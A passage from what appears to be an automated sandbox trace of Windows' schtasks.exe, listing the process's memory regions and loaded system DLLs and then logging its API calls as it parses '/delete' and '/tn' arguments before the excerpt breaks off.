start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1504
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1505
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1506
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1507
start_va = 0x160000
end_va = 0x1c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1508
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1509
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1510
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1511
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1512
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1513
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1514
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1515
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1516
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1517
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1518
start_va = 0x250000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1519
start_va = 0x250000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1520
start_va = 0x3b0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 1521
start_va = 0x350000
end_va = 0x378fff
monitored = 0
entry_point = 0x351010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1522
start_va = 0x3c0000
end_va = 0x547fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 1523
start_va = 0x350000
end_va = 0x378fff
monitored = 0
entry_point = 0x351010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1524
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1525
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1526
start_va = 0x550000
end_va = 0x6d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1527
start_va = 0x6e0000
end_va = 0x1adffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 1528
start_va = 0x350000
end_va = 0x361fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\System32\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\schtasks.exe.mui")
Region:
id = 1529
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1530
start_va = 0x60000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1531
start_va = 0x370000
end_va = 0x370fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 1532
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1533
start_va = 0x1ae0000
end_va = 0x1daefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1534
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1535
start_va = 0x1db0000
end_va = 0x1e2cfff
monitored = 0
entry_point = 0x1dbcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1536
start_va = 0x1e30000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 1537
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 1538
start_va = 0x1db0000
end_va = 0x1e2cfff
monitored = 0
entry_point = 0x1dbcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1539
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1540
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1541
start_va = 0x1eb0000
end_va = 0x20cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001eb0000"
filename = ""
Region:
id = 1542
start_va = 0x1eb0000
end_va = 0x1f8efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001eb0000"
filename = ""
Region:
id = 1543
start_va = 0x2050000
end_va = 0x20cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002050000"
filename = ""
Region:
id = 1544
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1545
start_va = 0x380000
end_va = 0x380fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000380000"
filename = ""
Region:
id = 1546
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1547
start_va = 0x390000
end_va = 0x390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 1548
start_va = 0x7fefb530000
end_va = 0x7fefb656fff
monitored = 0
entry_point = 0x7fefb5310ec
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1549
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1550
start_va = 0x1f90000
end_va = 0x204ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 81
os_tid = 0x700
[0371.467] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fd90 | out: lpSystemTimeAsFileTime=0x24fd90*(dwLowDateTime=0xf57bd200, dwHighDateTime=0x1dab598))
[0371.467] GetCurrentProcessId () returned 0x448
[0371.467] GetCurrentThreadId () returned 0x700
[0371.467] GetTickCount () returned 0x142524a
[0371.468] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x24fd98 | out: lpPerformanceCount=0x24fd98*=2125216488344) returned 1
[0371.469] GetModuleHandleW (lpModuleName=0x0) returned 0xffe60000
[0371.469] __set_app_type (_Type=0x1)
[0371.469] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe8972c) returned 0x0
[0371.470] __wgetmainargs (in: _Argc=0xffea1240, _Argv=0xffea1250, _Env=0xffea1248, _DoWildCard=0, _StartInfo=0xffea125c | out: _Argc=0xffea1240, _Argv=0xffea1250, _Env=0xffea1248) returned 0
[0371.472] _onexit (_Func=0xffe92ab0) returned 0xffe92ab0
[0371.472] _onexit (_Func=0xffe92ac4) returned 0xffe92ac4
[0371.472] _onexit (_Func=0xffe92afc) returned 0xffe92afc
[0371.473] _onexit (_Func=0xffe92b58) returned 0xffe92b58
[0371.473] _onexit (_Func=0xffe92b80) returned 0xffe92b80
[0371.473] _onexit (_Func=0xffe92ba8) returned 0xffe92ba8
[0371.474] _onexit (_Func=0xffe92bd0) returned 0xffe92bd0
[0371.474] _onexit (_Func=0xffe92bf8) returned 0xffe92bf8
[0371.474] _onexit (_Func=0xffe92c20) returned 0xffe92c20
[0371.475] _onexit (_Func=0xffe92c48) returned 0xffe92c48
[0371.482] _onexit (_Func=0xffe92c70) returned 0xffe92c70
[0371.483] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0371.483] WinSqmIsOptedIn () returned 0x0
[0371.484] GetProcessHeap () returned 0x60000
[0371.484] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7b9b0
[0371.485] SetLastError (dwErrCode=0x0)
[0371.487] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0371.487] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0371.487] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0371.487] VerifyVersionInfoW (in: lpVersionInformation=0x24f550, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24f550) returned 1
[0371.487] GetProcessHeap () returned 0x60000
[0371.487] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7b9d0
[0371.487] lstrlenW (lpString="") returned 0
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x2) returned 0x7b9f0
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75970
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba10
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x759a0
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x759d0
[0371.488] GetProcessHeap () returned 0x60000
[0371.489] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75a00
[0371.489] GetProcessHeap () returned 0x60000
[0371.489] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75a30
[0371.489] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba30
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75a60
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75a90
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75ac0
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75af0
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba50
[0371.490] GetProcessHeap () returned 0x60000
[0371.491] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75b20
[0371.491] GetProcessHeap () returned 0x60000
[0371.491] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75b50
[0371.491] GetProcessHeap () returned 0x60000
[0371.492] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75b80
[0371.492] GetProcessHeap () returned 0x60000
[0371.492] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75bb0
[0371.492] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0371.493] SetLastError (dwErrCode=0x0)
[0371.493] GetProcessHeap () returned 0x60000
[0371.493] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75be0
[0371.493] GetProcessHeap () returned 0x60000
[0371.493] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75c10
[0371.493] GetProcessHeap () returned 0x60000
[0371.493] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75c40
[0371.493] GetProcessHeap () returned 0x60000
[0371.493] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75c70
[0371.493] GetProcessHeap () returned 0x60000
[0371.494] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75ca0
[0371.494] GetProcessHeap () returned 0x60000
[0371.494] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba70
[0371.494] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.494] GetProcessHeap () returned 0x60000
[0371.494] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x208) returned 0x7bc10
[0371.494] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7bc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0371.495] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefc990000
[0371.500] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoSizeW") returned 0x7fefc9915fc
[0371.500] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0371.504] GetProcessHeap () returned 0x60000
[0371.504] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x74e) returned 0x7c1e0
[0371.504] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoW") returned 0x7fefc991614
[0371.505] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x7c1e0 | out: lpData=0x7c1e0) returned 1
[0371.505] GetProcAddress (hModule=0x7fefc990000, lpProcName="VerQueryValueW") returned 0x7fefc9915e0
[0371.505] VerQueryValueW (in: pBlock=0x7c1e0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f638, puLen=0x24f6a0 | out: lplpBuffer=0x24f638*=0x7c57c, puLen=0x24f6a0) returned 1
[0371.512] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.512] _vsnwprintf (in: _Buffer=0x7bc10, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24f618 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0371.512] VerQueryValueW (in: pBlock=0x7c1e0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f6a8, puLen=0x24f698 | out: lplpBuffer=0x24f6a8*=0x7c3a8, puLen=0x24f698) returned 1
[0371.513] lstrlenW (lpString="schtasks.exe") returned 12
[0371.513] lstrlenW (lpString="schtasks.exe") returned 12
[0371.513] lstrlenW (lpString=".EXE") returned 4
[0371.513] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0371.516] lstrlenW (lpString="schtasks.exe") returned 12
[0371.516] lstrlenW (lpString=".EXE") returned 4
[0371.516] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.516] lstrlenW (lpString="schtasks") returned 8
[0371.518] GetProcessHeap () returned 0x60000
[0371.518] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7caf0
[0371.518] GetProcessHeap () returned 0x60000
[0371.518] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cb20
[0371.518] GetProcessHeap () returned 0x60000
[0371.518] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cb50
[0371.519] GetProcessHeap () returned 0x60000
[0371.519] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cb80
[0371.519] GetProcessHeap () returned 0x60000
[0371.519] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba90
[0371.519] _memicmp (_Buf1=0x7ba90, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xa0) returned 0x7c010
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cbb0
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cbe0
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cc10
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7bab0
[0371.520] _memicmp (_Buf1=0x7bab0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x200) returned 0x7d2c0
[0371.521] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x7d2c0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0371.522] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0371.522] GetProcessHeap () returned 0x60000
[0371.522] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x30) returned 0x77bd0
[0371.522] _vsnwprintf (in: _Buffer=0x7c010, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24f618 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0371.522] GetProcessHeap () returned 0x60000
[0371.522] GetProcessHeap () returned 0x60000
[0371.522] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0) returned 1
[0371.522] GetProcessHeap () returned 0x60000
[0371.523] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c1e0) returned 0x74e
[0371.523] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0 | out: hHeap=0x60000) returned 1
[0371.523] SetLastError (dwErrCode=0x0)
[0371.524] GetThreadLocale () returned 0x409
[0371.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.524] lstrlenW (lpString="?") returned 1
[0371.524] GetThreadLocale () returned 0x409
[0371.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.525] lstrlenW (lpString="create") returned 6
[0371.525] GetThreadLocale () returned 0x409
[0371.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.525] lstrlenW (lpString="delete") returned 6
[0371.525] GetThreadLocale () returned 0x409
[0371.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.525] lstrlenW (lpString="query") returned 5
[0371.525] GetThreadLocale () returned 0x409
[0371.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.525] lstrlenW (lpString="change") returned 6
[0371.525] GetThreadLocale () returned 0x409
[0371.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.526] lstrlenW (lpString="run") returned 3
[0371.526] GetThreadLocale () returned 0x409
[0371.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.526] lstrlenW (lpString="end") returned 3
[0371.526] GetThreadLocale () returned 0x409
[0371.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.527] lstrlenW (lpString="showsid") returned 7
[0371.527] GetThreadLocale () returned 0x409
[0371.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.528] SetLastError (dwErrCode=0x0)
[0371.528] SetLastError (dwErrCode=0x0)
[0371.528] lstrlenW (lpString="/delete") returned 7
[0371.528] lstrlenW (lpString="-/") returned 2
[0371.528] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.528] lstrlenW (lpString="?") returned 1
[0371.528] lstrlenW (lpString="?") returned 1
[0371.528] GetProcessHeap () returned 0x60000
[0371.528] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7c0c0
[0371.528] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.528] GetProcessHeap () returned 0x60000
[0371.528] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xa) returned 0x7c1e0
[0371.529] lstrlenW (lpString="delete") returned 6
[0371.529] GetProcessHeap () returned 0x60000
[0371.529] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7c200
[0371.529] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.530] GetProcessHeap () returned 0x60000
[0371.530] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x14) returned 0x7c220
[0371.530] _vsnwprintf (in: _Buffer=0x7c1e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|?|") returned 3
[0371.530] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.530] lstrlenW (lpString="|?|") returned 3
[0371.530] lstrlenW (lpString="|delete|") returned 8
[0371.530] SetLastError (dwErrCode=0x490)
[0371.530] lstrlenW (lpString="create") returned 6
[0371.530] lstrlenW (lpString="create") returned 6
[0371.530] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.530] GetProcessHeap () returned 0x60000
[0371.530] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0) returned 1
[0371.531] GetProcessHeap () returned 0x60000
[0371.531] RtlReAllocateHeap (Heap=0x60000, Flags=0xc, Ptr=0x7c1e0, Size=0x14) returned 0x7c240
[0371.531] lstrlenW (lpString="delete") returned 6
[0371.531] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.531] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|create|") returned 8
[0371.532] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.532] lstrlenW (lpString="|create|") returned 8
[0371.532] lstrlenW (lpString="|delete|") returned 8
[0371.532] StrStrIW (lpFirst="|create|", lpSrch="|delete|") returned 0x0
[0371.532] SetLastError (dwErrCode=0x490)
[0371.532] lstrlenW (lpString="delete") returned 6
[0371.532] lstrlenW (lpString="delete") returned 6
[0371.532] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.532] lstrlenW (lpString="delete") returned 6
[0371.532] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.533] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.533] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.533] lstrlenW (lpString="|delete|") returned 8
[0371.533] lstrlenW (lpString="|delete|") returned 8
[0371.533] StrStrIW (lpFirst="|delete|", lpSrch="|delete|") returned="|delete|"
[0371.533] SetLastError (dwErrCode=0x0)
[0371.533] SetLastError (dwErrCode=0x0)
[0371.533] SetLastError (dwErrCode=0x0)
[0371.533] lstrlenW (lpString="/tn") returned 3
[0371.533] lstrlenW (lpString="-/") returned 2
[0371.533] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.533] lstrlenW (lpString="?") returned 1
[0371.534] lstrlenW (lpString="?") returned 1
[0371.534] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.534] lstrlenW (lpString="tn") returned 2
[0371.534] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
